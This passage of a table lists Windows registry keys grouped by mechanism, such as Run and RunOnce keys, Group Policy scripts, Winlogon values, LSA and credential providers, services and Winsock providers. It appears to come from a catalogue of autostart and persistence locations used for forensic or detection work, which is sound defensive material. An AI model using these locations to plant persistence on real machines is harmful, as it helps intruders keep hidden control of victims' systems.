86 | LOGON | APPSETUP | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AppSetup |
87 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logoff**\Script |
88 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logon**\Script |
89 | LOGON | GROUP POLICY SCRIPT | HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown**\Script |
90 | LOGON | GROUP POLICY SCRIPT | HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup**\Script |
91 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Logoff**\Script |
92 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Logon**\Script |
93 | LOGON | GROUP POLICY SCRIPT | HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown**\Script |
94 | LOGON | GROUP POLICY SCRIPT | HKLM | SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Startup**\Script |
95 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | Software\Policies\Microsoft\Windows\System\Scripts\Logoff**\Script |
96 | LOGON | GROUP POLICY SCRIPT | HKCU HKLM | Software\Policies\Microsoft\Windows\System\Scripts\Logon**\Script |
97 | LOGON | GROUP POLICY SCRIPT | HKLM | Software\Policies\Microsoft\Windows\System\Scripts\Shutdown**\Script |
98 | LOGON | GROUP POLICY SCRIPT | HKLM | Software\Policies\Microsoft\Windows\System\Scripts\Startup**\Script |
99 | LOGON | RUN | HKLM | SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\InitialProgram |
100 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnceEx* |
101 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce* |
102 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run* |
103 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run* |
104 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\RunOnceEx* |
105 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\RunOnce* |
106 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\RunServicesOnce* |
107 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\RunServices* |
108 | LOGON | RUN | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Run* |
109 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnceEx* |
110 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce* |
111 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run* |
112 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run* |
113 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx* |
114 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce* |
115 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce* |
116 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices* |
117 | LOGON | RUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run* |
118 | LOGON | SHELL | HKCU HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell |
119 | LOGON | SHELL | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Policies\System\Shell |
120 | LOGON | TASKMAN | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman |
121 | LOGON | TERMINAL SERVER | HKLM | System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\StartupPrograms |
122 | LOGON | USERINIT | HKCU | Environment\UserInitLogonScript |
123 | LOGON | USERINIT | HKCU | Environment\UserInitMprLogonScript |
124 | LOGON | USERINIT | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit |
125 | LOGON | USERINIT | HKLM | System\CurrentControlSet\Control\Session Manager\Environment\UserInitLogonScript |
126 | LOGON | USERINIT | HKLM | System\CurrentControlSet\Control\Session Manager\Environment\UserInitMprLogonScript |
127 | LOGON | VMAPPLET | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VmApplet |
128 | LOGON ACTIVE SETUP | HKCU HKLM | Software\Microsoft\Active Setup\Installed Components*\StubPath | |
129 | LOGON ACTIVE SETUP | HKCU HKLM | Software\Wow6432Node\Microsoft\Active Setup\Installed Components*\StubPath | |
130 | LSA PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages | |
131 | LSA PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages | |
132 | LSA PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\Lsa\Security Packages | |
133 | LSA PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders | |
134 | NETWORK PROVIDER | HKLM | SYSTEM\CurrentControlSet\Control\NetworkProvider\Order\ProviderOrder | |
135 | NETWORK PROVIDER | HKLM | SYSTEM\CurrentControlSet\Services*\NetworkProvider\ProviderPath | |
136 | PRINT MONITOR | HKLM | SYSTEM\CurrentControlSet\Control\Print\Monitors*\Driver | |
137 | SERVICE OR DRIVER | HKLM | SYSTEM\CurrentControlSet\Services*\ImagePath | |
138 | SERVICE OR DRIVER | HKLM | SYSTEM\CurrentControlSet\Services*\Parameters\ServiceDll | |
139 | SERVICE OR DRIVER | HKLM | SYSTEM\CurrentControlSet\Services*\Performance\Library | |
140 | SERVICE OR DRIVER | HKLM | SYSTEM\CurrentControlSet\Services*\Type | |
141 | WINLOGON | HKCU | Control Panel\Desktop\Scrnsave.exe | |
142 | WINLOGON | HKLM | SYSTEM\Setup\CmdLine | |
143 | WINLOGON | HKCU | Software\Microsoft\Windows NT\CurrentVersion\Windows\load | |
144 | WINLOGON | HKCU | Software\Microsoft\Windows NT\CurrentVersion\Windows\run | |
145 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll | |
146 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LsaStart | |
147 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify*\DLLName | |
148 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SaveDumpStart | |
149 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ServiceControllerStart | |
150 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\System | |
151 | WINLOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost | |
152 | WINLOGON | HKLM | Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters* | |
153 | WINLOGON | HKLM | Software\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers* | |
154 | WINLOGON | HKLM | Software\Microsoft\Windows\CurrentVersion\Authentication\PLAP Providers* | |
155 | WINLOGON | HKLM | Software\Policies\Microsoft\Windows\Control Panel\Desktop\Scrnsave.exe | |
156 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll | |
157 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LsaStart | |
158 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify*\DLLName | |
159 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SaveDumpStart | |
160 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ServiceControllerStart | |
161 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\System | |
162 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\UIHost | |
163 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters* | |
164 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers* | |
165 | WINLOGON | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Authentication\PLAP Providers* | |
166 | WINLOGON | HKLM | Software\Wow6432Node\Policies\Microsoft\Windows\Control Panel\Desktop\Scrnsave.exe | |
167 | WINLOGON | HKLM | System\CurrentControlSet\Control\BootVerificationProgram\ImagePath | |
168 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL | |
169 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64*\LibraryPath | |
170 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries*\LibraryPath | |
171 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64*\PackedCatalogItem | |
172 | WINSOCK PROVIDER | HKLM | System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries*\PackedCatalogItem |